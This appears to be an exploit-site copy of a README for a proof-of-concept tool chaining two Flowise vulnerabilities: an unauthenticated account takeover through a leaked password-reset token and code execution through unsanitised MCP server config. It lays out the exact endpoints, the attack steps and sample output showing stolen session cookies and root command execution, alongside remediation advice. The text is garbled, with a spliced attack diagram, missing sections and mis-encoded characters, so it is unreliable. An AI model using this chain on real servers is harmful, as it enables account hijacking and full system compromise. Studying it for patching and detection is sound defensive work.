## https://sploitus.com/exploit?id=66FCB731-707B-51FB-8E17-862CAED2B9D1
# Flowise Dual CVE PoC โ CVE-2025-58434 + CVE-2025-59528





> โ ๏ธ **For educational and authorized security research only.**
> Running this tool against systems you do not own or lack written permission to test is **illegal**.
---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [CVE-2025-58434 โ Account Takeover](#cve-2025-58434--account-takeover)
- [CVE-2025-59528 โ Remote Code Execution](#cve-2025-59528--remote-code-execution)
- [Full Attack Chain](#full-attack-chain)
- [Affected Versions](#affected-versions)
- [Repository Structure](#repository-structure)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Help Screen](#help-screen)
- [Chain Mode](#chain-mode-full-automation)
- [Module โ ATO](#module--ato)
- [Module โ Login](#module--login)
- [Module โ RCE](#module--rce)
- [Flag Reference](#flag-reference)
- [Example Output](#example-output)
- [Remediation](#remediation)
- [Disclosure Timeline](#disclosure-timeline)
- [References](#references)
- [Disclaimer](#disclaimer)
---
## Overview
This repository combines two **critical** vulnerabilities in [Flowise](https://github.com/FlowiseAI/Flowise) into a single, modular PoC tool.
| | CVE-2025-58434 | CVE-2025-59528 |
|---|---|---|
| **Type** | Account Takeover | Remote Code Execution |
| **Auth Required** | None | Yes (any valid account) |
| **CVSS** | 9.8 Critical | Critical |
| **Affected** | Cloud + Self-hosted | Self-hosted |
The two vulnerabilities chain naturally: CVE-2025-58434 provides unauthenticated account takeover, which then satisfies the authentication requirement for CVE-2025-59528, achieving **unauthenticated RCE** in a single automated flow.
---
## Vulnerability Details
### CVE-2025-58434 โ Account Takeover
**Root Cause:** The `forgot-password` endpoint returns the password reset token (`tempToken`) directly in the HTTP response body instead of sending it only to the registered email address.
**Attack Steps:**
1. `POST /api/v1/account/forgot-password` with any registered email
2. Read `tempToken` from the JSON response โ no email access needed
3. `POST /api/v1/account/reset-password` with the leaked token to set a new password
4. Log in as the victim
**Leaked response structure:**
```json
{
"user": {
"id": "",
"name": "Admin",
"email": "admin@example.com",
"credential": "",
"tempToken": "LEAKED_TOKEN_HERE",
"tokenExpiry": "2025-08-19T13:00:33.834Z",
"status": "active"
}
}
```
---
### CVE-2025-59528 โ Remote Code Execution
**Root Cause:** The `CustomMCP` node processes user-supplied `mcpServerConfig` by passing it directly to JavaScript's `Function()` constructor with no sanitization. Since Flowise runs in Node.js, the injected code has access to `process.mainModule`, `child_process`, `fs`, and all other Node.js built-ins.
**Vulnerable code path:**
```
POST /api/v1/node-load-method/customMCP
-> convertToValidJSONString()
-> Function('return ' + mcpServerConfig)() ; refreshToken=; connect.sid=
```
---
## Full Attack Chain
```
Attacker Flowise API
| |
| [CVE-2025-58434] |
| POST /forgot-password {email} |
|------------------------------------->|
||
||
|} |
|------------------------------------->|
| admin@example.com / Flowise@Pwn3d2025!
[Step 3] [CVE-2025-59528] Logging in to extract session cookies ...
--------------------------------------------------------------------
EXTRACTED SESSION COOKIES
--------------------------------------------------------------------
token : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
refreshToken : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
connect_sid : s%3A4rey2nukFChp1ScRoJCbsBrRPf-DVBW5...
--------------------------------------------------------------------
[Step 4] [CVE-2025-59528] Executing RCE via CustomMCP ...
[*] Command : id
[*] HTTP 200
--------------------------------------------------------------------
COMMAND OUTPUT
--------------------------------------------------------------------
$ id
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------------------------
[+] RCE confirmed!
[+] Full chain complete.
```
---
## Remediation
### For CVE-2025-58434
- **Never return tokens in API responses.** Send the `tempToken` only via the registered email.
- Respond with a **generic success message** regardless of whether the email exists (prevents enumeration).
- Make tokens **single-use**, short-lived (โค15 min), and tied to request context.
- **Rate-limit** the `forgot-password` endpoint.
### For CVE-2025-59528
- **Never pass user input to `Function()`, `eval()`, or `vm.runInThisContext()`.**
- Parse `mcpServerConfig` as **data only** (e.g., `JSON.parse()`) โ never execute it.
- If dynamic evaluation is genuinely required, run it inside an isolated **sandbox** (e.g., `vm.runInNewContext()` with a restricted context, or a subprocess).
- Apply **strict input validation** and an allowlist of permitted configuration keys.
### General
- Apply all patches to **both cloud and self-hosted deployments**.
- Enable **logging and alerting** on password reset and node-load-method endpoints.
- Consider **MFA** for all admin accounts.
---
## Disclosure Timeline
| Date | Event |
|---|---|
| 2025-08-19 | CVE-2025-58434 discovered and reported |
| TBD | CVE-2025-59528 discovered and reported |
| TBD | Vendor acknowledgement |
| TBD | Patch released |
| TBD | Public disclosure |
---
## References
- [GHSA-wgpv-6j63-x5ph โ CVE-2025-58434 Advisory](https://github.com/advisories/GHSA-wgpv-6j63-x5ph)
- [GHSA-3gcm-f6qx-ff7p โ CVE-2025-59528 Advisory](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p)
- [NVD โ CVE-2025-58434](https://nvd.nist.gov/vuln/detail/CVE-2025-58434)
- [Flowise GitHub](https://github.com/FlowiseAI/Flowise)
- [CWE-640: Weak Password Recovery Mechanism](https://cwe.mitre.org/data/definitions/640.html)
- [CWE-94: Improper Control of Code Generation](https://cwe.mitre.org/data/definitions/94.html)
---
## Disclaimer
This project is intended solely for **educational purposes** and **authorized penetration testing**.
- Do **NOT** run this against any system without **explicit written permission** from the system owner.
- The author(s) accept **no responsibility** for misuse, damage, or legal consequences.
- See [DISCLAIMER.md](./DISCLAIMER.md) for the full legal notice.